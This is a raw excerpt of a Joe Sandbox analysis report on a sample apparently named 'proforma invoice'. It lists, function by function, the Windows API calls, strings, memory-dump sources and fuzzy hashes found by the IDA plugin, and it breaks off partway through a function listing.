                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                  • String ID:
                  • API String ID: 895679908-0
                  • Opcode ID: b2d45f339abeae7d27845a061069970e28eef44f9a7b4d3da57a7d986c9b0d40
                  • Instruction ID: 55e0f34dcd3ec3d68e8cb1b7528f755a139f81548483d271a8adf626d2bec9e2
                  • Opcode Fuzzy Hash: b2d45f339abeae7d27845a061069970e28eef44f9a7b4d3da57a7d986c9b0d40
                  • Instruction Fuzzy Hash: 1A712B31A00A09AFDB20DFA8CE85AAFBFF5FB48704F104558E546A39A0DB75A944CF50
                  APIs
                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00AC00C6
                    • Part of subcall function 00AC00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00B7070C,00000FA0,42AEFFA0,?,?,?,?,00AE23B3,000000FF), ref: 00AC011C
                    • Part of subcall function 00AC00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00AE23B3,000000FF), ref: 00AC0127
                    • Part of subcall function 00AC00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00AE23B3,000000FF), ref: 00AC0138
                    • Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00AC014E
                    • Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00AC015C
                    • Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00AC016A
                    • Part of subcall function 00AC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AC0195
                    • Part of subcall function 00AC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AC01A0
                  • ___scrt_fastfail.LIBCMT ref: 00AC00E7
                    • Part of subcall function 00AC00A3: __onexit.LIBCMT ref: 00AC00A9
                  Strings
                  • InitializeConditionVariable, xrefs: 00AC0148
                  • kernel32.dll, xrefs: 00AC0133
                  • SleepConditionVariableCS, xrefs: 00AC0154
                  • WakeAllConditionVariable, xrefs: 00AC0162
                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00AC0122
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                  • API String ID: 66158676-1714406822
                  • Opcode ID: 1bbcc0dddaee409825f7902dcbe6d59c1b8750ccc0e2ba66051c94a336f1eddf
                  • Instruction ID: 3880327048e2ebea9f22216e6ad0ffcf3baa7dba3986164c54bb48260e8a4762
                  • Opcode Fuzzy Hash: 1bbcc0dddaee409825f7902dcbe6d59c1b8750ccc0e2ba66051c94a336f1eddf
                  • Instruction Fuzzy Hash: DC21A732A44711EBD7116BA4AD09F7E77E8EB05B51F26063EF815B72A1DFB49C008B90
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                  • API String ID: 176396367-1603158881
                  • Opcode ID: 3304d2ec3669d875fce7249e1a0e438f22c86789875a23589470944de72796ad
                  • Instruction ID: ed097928b575314d7df5907ebfa460d98f3720301f5d6b45491e59897201bcae
                  • Opcode Fuzzy Hash: 3304d2ec3669d875fce7249e1a0e438f22c86789875a23589470944de72796ad
                  • Instruction Fuzzy Hash: DBE1F532A005169BCB24DF64C899BEEBFF8FF54B10F548199E456B72D0DB30AE858790
                  APIs
                  • CharLowerBuffW.USER32(00000000,00000000,00B3CC08), ref: 00B14527
                  • _wcslen.LIBCMT ref: 00B1453B
                  • _wcslen.LIBCMT ref: 00B14599
                  • _wcslen.LIBCMT ref: 00B145F4
                  • _wcslen.LIBCMT ref: 00B1463F
                  • _wcslen.LIBCMT ref: 00B146A7
                    • Part of subcall function 00ABF9F2: _wcslen.LIBCMT ref: 00ABF9FD
                  • GetDriveTypeW.KERNEL32(?,00B66BF0,00000061), ref: 00B14743
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharDriveLowerType
                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                  • API String ID: 2055661098-1000479233
                  • Opcode ID: 7fdde14c8a9eb356641981b2ccb4df47b67447d2c4a5e150859b724f95434336
                  • Instruction ID: d89c382d928050e8b52ef93eb7a63cc2c8ef6a6611395bba3f80d18af6e703e6
                  • Opcode Fuzzy Hash: 7fdde14c8a9eb356641981b2ccb4df47b67447d2c4a5e150859b724f95434336
                  • Instruction Fuzzy Hash: 31B1F1316083029FC710DF28C991AAEB7E5EFA6764F94499DF496C7291D730DC84CBA2
                  APIs
                  • _wcslen.LIBCMT ref: 00B2B198
                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B1B0
                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B1D4
                  • _wcslen.LIBCMT ref: 00B2B200
                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B214
                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B236
                  • _wcslen.LIBCMT ref: 00B2B332
                    • Part of subcall function 00B105A7: GetStdHandle.KERNEL32(000000F6), ref: 00B105C6
                  • _wcslen.LIBCMT ref: 00B2B34B
                  • _wcslen.LIBCMT ref: 00B2B366
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B2B3B6
                  • GetLastError.KERNEL32(00000000), ref: 00B2B407
                  • CloseHandle.KERNEL32(?), ref: 00B2B439
                  • CloseHandle.KERNEL32(00000000), ref: 00B2B44A
                  • CloseHandle.KERNEL32(00000000), ref: 00B2B45C
                  • CloseHandle.KERNEL32(00000000), ref: 00B2B46E
                  • CloseHandle.KERNEL32(?), ref: 00B2B4E3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                  • String ID:
                  • API String ID: 2178637699-0
                  • Opcode ID: 66125e9bda8ee0e0812001bd7f4aaa385f97adc92776e54349372405e35453c3
                  • Instruction ID: 7bb0d90baac72f899d86f1c56d07e021cd3dc3e932dbd2bc492e1bceb44c5645
                  • Opcode Fuzzy Hash: 66125e9bda8ee0e0812001bd7f4aaa385f97adc92776e54349372405e35453c3
                  • Instruction Fuzzy Hash: 46F169315043109FCB15EF24D991B6EBBE5EF85314F18899DF8999B2A2DB31EC40CB52
                  APIs
                  • GetMenuItemCount.USER32(00B71990), ref: 00AE2F8D
                  • GetMenuItemCount.USER32(00B71990), ref: 00AE303D
                  • GetCursorPos.USER32(?), ref: 00AE3081
                  • SetForegroundWindow.USER32(00000000), ref: 00AE308A
                  • TrackPopupMenuEx.USER32(00B71990,00000000,?,00000000,00000000,00000000), ref: 00AE309D
                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AE30A9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                  • String ID: 0
                  • API String ID: 36266755-4108050209
                  • Opcode ID: 53c636a7106255b1649bdd638409ccdeed1321de92df765a09bdb956e4c14962
                  • Instruction ID: d874314966aa69529ed1ed9fde3d7ee3c27e2e8a13a025e3f45928f66591bd03
                  • Opcode Fuzzy Hash: 53c636a7106255b1649bdd638409ccdeed1321de92df765a09bdb956e4c14962
                  • Instruction Fuzzy Hash: 73710631640255BEEB259F69CC49FAABF78FF05324F204216F5156B1E0CBB1AD64CB90
                  APIs
                  • DestroyWindow.USER32(?,?), ref: 00B36DEB
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B36E5F
                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B36E81
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B36E94
                  • DestroyWindow.USER32(?), ref: 00B36EB5
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AA0000,00000000), ref: 00B36EE4
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B36EFD
                  • GetDesktopWindow.USER32 ref: 00B36F16
                  • GetWindowRect.USER32(00000000), ref: 00B36F1D
                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B36F35
                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B36F4D
                    • Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                  • String ID: 0$tooltips_class32
                  • API String ID: 2429346358-3619404913
                  • Opcode ID: e7861b2365d6f6b7966be562d362c2d5b3c1828061f89bf1fe8bfa479ff60593
                  • Instruction ID: 23d329f0bf3936f2e9353836023f19859ba634ebdf3f3ed0c3463d5e82146b74
                  • Opcode Fuzzy Hash: e7861b2365d6f6b7966be562d362c2d5b3c1828061f89bf1fe8bfa479ff60593
                  • Instruction Fuzzy Hash: C1716974144244AFDB21CF18DC44FAABBE9FB89304F24485DFA9997261CB70A94ACB21
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • DragQueryPoint.SHELL32(?,?), ref: 00B39147
                    • Part of subcall function 00B37674: ClientToScreen.USER32(?,?), ref: 00B3769A
                    • Part of subcall function 00B37674: GetWindowRect.USER32(?,?), ref: 00B37710
                    • Part of subcall function 00B37674: PtInRect.USER32(?,?,00B38B89), ref: 00B37720
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B391B0
                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B391BB
                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B391DE
                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B39225
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B3923E
                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B39255
                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B39277
                  • DragFinish.SHELL32(?), ref: 00B3927E
                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B39371
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                  • API String ID: 221274066-3440237614
                  • Opcode ID: 81f72e75f5f3d484438bfe3116d9d4603f6f209606aae2a865cb6454c95880f0
                  • Instruction ID: 3cc201f291b4bc4e08255ece6cac06a3900c96fdf1379a679e24b4e154aae94b
                  • Opcode Fuzzy Hash: 81f72e75f5f3d484438bfe3116d9d4603f6f209606aae2a865cb6454c95880f0
                  • Instruction Fuzzy Hash: 77618B71108301AFD701EFA4CD85DAFBBE8EF89750F10495DF595932A0DB709A49CB62
                  APIs
                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B1C4B0
                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B1C4C3
                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B1C4D7
                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B1C4F0
                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B1C533
                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B1C549
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B1C554
                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B1C584
                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B1C5DC
                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B1C5F0
                  • InternetCloseHandle.WININET(00000000), ref: 00B1C5FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                  • String ID:
                  • API String ID: 3800310941-3916222277
                  • Opcode ID: fa123d51ce03974958a3aaa61aaf0699a3cd684db2dedd6d9dbaa4b5ba9b23a6
                  • Instruction ID: bb39406c25a659e4cb6109f8dd77e7a99d9ef54157da8f8eb21655ff052abddd
                  • Opcode Fuzzy Hash: fa123d51ce03974958a3aaa61aaf0699a3cd684db2dedd6d9dbaa4b5ba9b23a6
                  • Instruction Fuzzy Hash: 775139B1540208BFEB218FA4C989ABB7FFDFB18754F504459F945E7210DB34EA889B60
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00B38592
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00B385A2
                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00B385AD
                  • CloseHandle.KERNEL32(00000000), ref: 00B385BA
                  • GlobalLock.KERNEL32(00000000), ref: 00B385C8
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B385D7
                  • GlobalUnlock.KERNEL32(00000000), ref: 00B385E0
                  • CloseHandle.KERNEL32(00000000), ref: 00B385E7
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00B385F8
                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B3FC38,?), ref: 00B38611
                  • GlobalFree.KERNEL32(00000000), ref: 00B38621
                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 00B38641
                  • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00B38671
                  • DeleteObject.GDI32(00000000), ref: 00B38699
                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B386AF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                  • String ID:
                  • API String ID: 3840717409-0
                  • Opcode ID: c68392a251a38c15dbf543eb89628b8f55c34152a450a644f35f03847f7dd728
                  • Instruction ID: ff2bc5ff9811b92a73743e9ace7b5cd381af7941c91748e0732ce856c9241158
                  • Opcode Fuzzy Hash: c68392a251a38c15dbf543eb89628b8f55c34152a450a644f35f03847f7dd728
                  • Instruction Fuzzy Hash: A241F975600204BFDB119FA9DC89EAF7BB8FF89711F208059F905E7260DB30A901DB61
                  APIs
                  • VariantInit.OLEAUT32(00000000), ref: 00B11502
                  • VariantCopy.OLEAUT32(?,?), ref: 00B1150B
                  • VariantClear.OLEAUT32(?), ref: 00B11517
                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B115FB
                  • VarR8FromDec.OLEAUT32(?,?), ref: 00B11657
                  • VariantInit.OLEAUT32(?), ref: 00B11708
                  • SysFreeString.OLEAUT32(?), ref: 00B1178C
                  • VariantClear.OLEAUT32(?), ref: 00B117D8
                  • VariantClear.OLEAUT32(?), ref: 00B117E7
                  • VariantInit.OLEAUT32(00000000), ref: 00B11823
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                  • API String ID: 1234038744-3931177956
                  • Opcode ID: da1abdb1166d8326a1d9dc87ea1a3cbe922bb5fff6b11114b28961f9f55103d5
                  • Instruction ID: 8c5ad28c79aa720c9b8e5e8031159b9e8b970bbc4ddd5b05b5e3f2ef64570fc9
                  • Opcode Fuzzy Hash: da1abdb1166d8326a1d9dc87ea1a3cbe922bb5fff6b11114b28961f9f55103d5
                  • Instruction Fuzzy Hash: 48D10071A00115DFDB009F69D884BBDB7F6FF45700FA48996E646AB281DB30DD80DB62
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2B6F4
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2B772
                  • RegDeleteValueW.ADVAPI32(?,?), ref: 00B2B80A
                  • RegCloseKey.ADVAPI32(?), ref: 00B2B87E
                  • RegCloseKey.ADVAPI32(?), ref: 00B2B89C
                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B2B8F2
                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B2B904
                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B2B922
                  • FreeLibrary.KERNEL32(00000000), ref: 00B2B983
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B2B994
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                  • String ID: RegDeleteKeyExW$advapi32.dll
                  • API String ID: 146587525-4033151799
                  • Opcode ID: a1e3dbc281697352c7f7815844950c23b7becec3ff2eb0bbb8dda203b86d42db
                  • Instruction ID: 59cfa3b45b4b9e76861ac4a6208571a83fee23ef164489f19e29ef57220c9e2f
                  • Opcode Fuzzy Hash: a1e3dbc281697352c7f7815844950c23b7becec3ff2eb0bbb8dda203b86d42db
                  • Instruction Fuzzy Hash: 3CC1AD34208211AFD714DF14D495F2ABBE5FF85318F14859CF5AA8B2A2CB35EC45CB92
                  APIs
                  • GetDC.USER32(00000000), ref: 00B225D8
                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B225E8
                  • CreateCompatibleDC.GDI32(?), ref: 00B225F4
                  • SelectObject.GDI32(00000000,?), ref: 00B22601
                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B2266D
                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B226AC
                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B226D0
                  • SelectObject.GDI32(?,?), ref: 00B226D8
                  • DeleteObject.GDI32(?), ref: 00B226E1
                  • DeleteDC.GDI32(?), ref: 00B226E8
                  • ReleaseDC.USER32(00000000,?), ref: 00B226F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                  • String ID: (
                  • API String ID: 2598888154-3887548279
                  • Opcode ID: 37aa845260d5a38bc216b5b54c9d64d392c005ca968ba171152ae6384234a75f
                  • Instruction ID: 0468a31f6b0769d3ad4b7af101401ca0e79dae15469677c1a9765be8e8b82cfa
                  • Opcode Fuzzy Hash: 37aa845260d5a38bc216b5b54c9d64d392c005ca968ba171152ae6384234a75f
                  • Instruction Fuzzy Hash: 9E61E076D00219EFCF15CFA4D884AAEBBF6FF48310F208569E959A7250D770A941DFA0
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 00ADDAA1
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD659
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD66B
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD67D
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD68F
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6A1
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6B3
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6C5
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6D7
